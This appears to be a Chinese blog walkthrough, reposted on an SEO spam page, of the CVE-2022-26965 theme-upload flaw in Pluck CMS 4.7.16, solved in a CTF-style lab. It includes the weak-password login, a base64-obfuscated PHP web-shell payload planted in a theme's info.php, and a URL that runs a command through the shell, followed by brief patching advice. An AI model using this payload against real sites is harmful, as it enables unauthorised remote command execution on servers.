当前位置: 首页 > news >正文

后台管理网站模板下载seo外包服务优化

后台管理网站模板下载,seo外包服务优化,网站关键词突然没有排名了,如何修改英文WordPress主题首页简介 CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。 攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。 过程 1.打开环境,查看源码,发现login.php 2.进…

简介

CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞

攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。

过程

1.打开环境,查看源码,发现login.php

2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈

3.找到上传cms主题界面

4.去github下载相对应的版本主题,随便下载一个就行

https://github.com/billcreswell/redline-theme

5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码

<?phpfile_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));?>

解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。

6.修改好的文件进行上传

文件上传成功。

7.连接

http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag

成功。

解决方案

这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。

攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。

除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。

http://www.yayakq.cn/news/653253/

相关文章:

  • wordpress网站打开很慢东莞网站建设的公司
  • 新网站如何做推广软文唐山营销型网站建设
  • 广东官方移动网站建设哪家好在国外网站付款要怎么做
  • 注入漏洞网站源码如何管理wordpress网站模板下载
  • 济南网站建设内容滑县网站建设
  • 黑马程序员大学叫什么郑州seo线上推广技术
  • 杭州网站开发 网站建设外链网站 英文
  • 网站开发 方案 报价男女做爰高清免费视频网站
  • 中国建设银行黑龙江支行官方网站开发公司是否可以代建筑公司支付材料款
  • 内蒙古建设住房与城乡厅官方网站wordpress重建伪静态
  • 外贸企业网站源码下载gofair外贸建站
  • 网站建设新手看什么书网站建设经验
  • 桂林做手机网站建设工程师交易网站
  • 网站建设站点自然资源网站建设方案
  • 工程建设质量安全管理协会网站ppt模板怎么下载
  • 建设app下载官网泰州seo公司
  • 龙华区城市建设局网站wordpress不显示引用图片不显示
  • 域名建议网站深圳网站seo公司
  • 常州网站制作计划邢台做移动网站多少钱
  • 海外网站加速器wordpress 漏洞复现
  • 张家界网站建设app网页设计与制作教学大纲
  • 重庆做公司网站seo自媒体运营技巧
  • 西安学校网站建设报价筑楼人官方网
  • 郑州网站建设创新网络网站标题字体设计
  • 北京制作网站的公司简介中小微企业查询平台
  • 建设服装网站目的织梦做的网站老是被黑
  • 建设企业网站怎么样哪里可以买淘宝店
  • 天河建设网站专家手机网站建设制作
  • 网站模板 wordpress带会员系统深圳微信小程序平台
  • 科技期刊网站建设黄冈建设网站